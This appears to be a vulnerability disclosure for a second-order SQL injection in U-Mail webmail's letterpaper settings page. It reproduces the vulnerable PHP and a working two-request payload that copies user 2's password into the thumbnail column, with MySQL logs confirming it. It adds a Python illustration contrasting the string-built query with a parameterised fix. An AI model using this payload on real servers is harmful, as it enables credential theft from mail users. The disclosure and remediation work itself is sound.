Windows Server 2003, default installation, latest version. Vulnerable file: /client/option/module/o_letterpaper.php
if ( ACTION == "letterpaper-set" ) {
    $url = make_link( "option", "view", "letterpaper" );
    $lp_id = intval( gss( $_POST['id'] ) );
    .....
    if ( gss( $_POST['padding'] ) ) {
        $style .= "padding:".gss( $_POST['padding'] ).";";
    } else {
        $style .= "padding:20px 30px;";
    }
    if ( $lp_id ) {
        $where = "id='".$lp_id."'";
        $lp_info = $Widget->getone_letterpaper( $where, "*", 0 );
        if ( gss( $_POST['bgImgPath'] ) ) {
            $suffix = fileext( $_POST['bgImgPath'] );
            check_upload_suffix( $suffix );
            $bgimg = WEBMAIL_URL."resource/images/letterpaper/".$lp_id.".".$suffix;
            $thumb = WEBMAIL_URL."resource/images/letterpaper/thumbnail/".$lp_id.".".$suffix;
            $style .= "background-image:url(".$bgimg.");";
        } else if ( !gss( $_POST['bgImgUrl'] ) ) { // first request enters here and stores the injection payload
            $thumb = gss( $_POST['bgColor'] ) ? "background-color:".gss( $_POST['bgColor'] ) : "background-color:#fff";
        } else {
            $thumb = $lp_info['thumbnail']; // second request enters here: $thumb receives the value just read back from the database
            $style .= "background-image:".gss( $_POST['bgImgUrl'] ).";";
        }
        $letterpaper_new = str_replace( "%s", $style, $letterpaper );
        $data = array( "letterpaper" => $letterpaper_new, "thumbnail" => $thumb );
        $where = "id='".$lp_id."'";
        $res = $Widget->update_letterpaper( $data, $where, 0 ); // goes into the update
First update: we store the payload used for the second-order injection, xx',`thumbnail`=(SELECT password from userlist where userid=2)# . The second request makes the code query the previously stored value back out of the database, assign it to $thumb, and run the update again with it.
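The flow above is the textbook second-order injection: gss() escapes request input on the way in, so the first UPDATE is safe, but the value is stored with its quote intact and is trusted once it comes back out of the database. The following is an added illustration written for this write-up, not code from the U-Mail project: it models the two request paths against an in-memory SQLite database (constructed stand-in tables and a placeholder password, not the real schema), shows the escape-at-the-boundary version losing the password to the reused thumbnail, and shows the parameterised UPDATE that fixes it. Because SQLite stands in for MySQL, the comment marker is `--` instead of `#` and first-order escaping is quote doubling rather than addslashes; the function names and the `escape` parameter are assumptions of this example.

```python
import sqlite3

# Constructed stand-in payload and secret; the real report uses a MySQL '#' comment.
PAYLOAD = "xx',`thumbnail`=(SELECT password FROM userlist WHERE userid=2)--"
SECRET = "hash-placeholder-for-userid-2"


def make_db():
    """Fresh in-memory database: one letterpaper row and one target user (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE letterpaper (id INTEGER PRIMARY KEY, letterpaper TEXT, thumbnail TEXT)")
    db.execute("CREATE TABLE userlist (userid INTEGER PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO letterpaper VALUES (1, '<div></div>', 'background-color:#fff')")
    db.execute("INSERT INTO userlist VALUES (2, ?)", (SECRET,))
    db.commit()
    return db


def gss(value):
    """Stand-in for the application's first-order escaping (assumed name kept from the
    report). SQLite string literals have no backslash escapes, so quotes are doubled;
    the weakness is identical: only request input is escaped, never stored data."""
    return value.replace("'", "''")


def build_style_and_thumb(db, lp_id, post, escape):
    """The two branches from o_letterpaper.php that the report exercises.
    `escape` is applied to request input only, mirroring where gss() is called."""
    row = db.execute("SELECT * FROM letterpaper WHERE id=?", (lp_id,)).fetchone()
    style = "padding:20px 30px;"
    if post.get("bgImgUrl"):
        # Second-order path: the thumbnail already in the database is reused verbatim.
        thumb = row["thumbnail"]
        style += "background-image:" + escape(post["bgImgUrl"]) + ";"
    else:
        thumb = "background-color:" + escape(post.get("bgColor", "#fff"))
    return style, thumb


def save_vulnerable(db, lp_id, post):
    """String-built UPDATE: correct for escaped request input, unsafe for stored input."""
    style, thumb = build_style_and_thumb(db, lp_id, post, gss)
    sql = "UPDATE letterpaper SET `letterpaper`='%s',`thumbnail`='%s' WHERE id=%d" % (style, thumb, lp_id)
    db.execute(sql)
    db.commit()


def save_hardened(db, lp_id, post):
    """Parameterised UPDATE: every value is bound, whether it came from the request
    or from a previous row, so no escaping step is needed or relied upon."""
    style, thumb = build_style_and_thumb(db, lp_id, post, lambda v: v)
    db.execute("UPDATE letterpaper SET letterpaper=?, thumbnail=? WHERE id=?", (style, thumb, lp_id))
    db.commit()


def run_two_step(save):
    """Replay the report's two requests against a fresh database and return the
    thumbnail column afterwards: the leaked secret for the vulnerable path, the
    harmless literal string for the hardened one."""
    db = make_db()
    save(db, 1, {"bgColor": PAYLOAD})   # request 1: store the payload
    save(db, 1, {"bgImgUrl": "xx"})     # request 2: reuse the stored thumbnail
    return db.execute("SELECT thumbnail FROM letterpaper WHERE id=1").fetchone()["thumbnail"]


if __name__ == "__main__":
    print("vulnerable:", run_two_step(save_vulnerable))
    print("hardened:  ", run_two_step(save_hardened))
```

The point the second run makes is that the fix is not "escape $lp_info['thumbnail'] as well" but binding every value in update_letterpaper(); escaping on read-back would still leave any other consumer of that column exposed.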
Proof of vulnerability: requires a U-Mail account. Step 1: visit http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set with POST body: id=1&bgColor=xx',`thumbnail`=(SELECT password from userlist where userid=2)#
Operation log:
150305 15:45:38 195 Connect umail@localhost on
195 Query SET NAMES 'UTF8'
195 Init DB umail
195 Query SELECT * FROM letterpaper WHERE id='1' LIMIT 1
195 Query UPDATE letterpaper SET `letterpaper`='<div id="lp_wrap" style="background-color:xx\',`thumbnail`=(SELECT password from userlist where userid=2)#;padding:20px 30px;"><div id="lp_wrap_content"></div></div>',`thumbnail`='background-color:xx\',`thumbnail`=(SELECT password from userlist where userid=2)#' WHERE id='1'
195 Quit
Step 2: visit http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set with POST body: id=1&bgImgUrl=xx
Operation log:
150305 15:47:41 196 Connect umail@localhost on
196 Query SET NAMES 'UTF8'
196 Init DB umail
196 Query SELECT * FROM letterpaper WHERE id='1' LIMIT 1
196 Query UPDATE letterpaper SET `letterpaper`='<div id="lp_wrap" style="padding:20px 30px;background-image:xx;"><div id="lp_wrap_content"></div></div>',`thumbnail`='background-color:xx',`thumbnail`=(SELECT password from userlist where userid=2)#' WHERE id='1'
196 Quit
The UPDATE succeeded. Finally, open http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set and view the page source.